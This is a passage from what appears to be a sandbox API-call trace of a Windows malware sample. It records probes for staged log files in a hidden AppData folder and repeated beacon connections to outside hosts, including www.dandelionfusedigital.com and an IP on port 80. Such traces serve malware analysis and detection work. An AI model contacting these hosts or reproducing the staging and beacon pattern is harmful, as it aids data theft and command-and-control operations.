ai_canonname=0x0, ai_addr=0x8883c60*(sa_family=2, sin_port=0x50, sin_addr="156.245.192.153"), ai_next=0x0)) returned 0 [0187.569] connect (s=0x25d0, name=0x8883c60*(sa_family=2, sin_port=0x50, sin_addr="156.245.192.153"), namelen=16) returned 0 [0187.771] send (s=0x25d0, buf=0xa10808a*, len=171, flags=0) returned 171 [0187.772] setsockopt (s=0x25d0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0187.772] recv (in: s=0x25d0, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 2359 [0187.996] closesocket (s=0x25d0) returned 0 [0187.997] Sleep (dwMilliseconds=0x7d0) [0187.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.999] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0187.999] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0187.999] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e2f0) returned 1 [0187.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.999] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0187.999] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0187.999] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894df00) returned 1 [0187.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.999] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0187.999] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0187.999] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0187.999] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.000] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.000] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.000] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e140) returned 1 [0188.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.000] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.000] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.000] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e650) returned 1 [0188.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.000] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.000] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.000] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e530) returned 1 [0188.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.000] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.000] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.000] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0188.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.000] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.000] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.000] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0188.000] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.000] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.001] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.001] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e0b0) returned 1 [0188.001] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.001] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.001] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.001] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.001] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.001] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.001] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0188.001] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e530) returned 1 [0188.001] socket (af=2, type=1, protocol=6) returned 0x25d0 [0188.001] getaddrinfo (in: pNodeName="www.dandelionfusedigital.com", pServiceName="80", pHints=0x8792678*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x87926a8 | out: ppResult=0x87926a8*=0x862b940*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8883b60*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.212"), ai_next=0x862eac0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88847e0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.211"), ai_next=0x77564b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884300*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), ai_next=0x7755db0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88842a0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.215"), ai_next=0x77561b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884840*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.217"), ai_next=0x77555f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884800*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.218"), ai_next=0x4d501e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88848a0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.210"), ai_next=0x0)))))))) returned 0 [0188.012] connect (s=0x25d0, name=0x8883b60*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.212"), namelen=16) returned 0 [0188.194] send (s=0x25d0, buf=0xa10808a*, len=172, flags=0) returned 172 [0188.194] setsockopt (s=0x25d0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0188.194] recv (in: s=0x25d0, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040) returned -1 [0188.394] closesocket (s=0x25d0) returned 0 [0188.394] Sleep (dwMilliseconds=0x7d0) [0188.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.396] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.396] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0188.396] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e380) returned 1 [0188.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.396] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.396] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.396] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e260) returned 1 [0188.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.396] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.396] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.396] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0188.396] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.396] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.397] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e410) returned 1 [0188.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.397] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.397] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894dcc0) returned 1 [0188.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0188.397] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0188.397] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0188.397] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e530) returned 1 [0188.397] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, 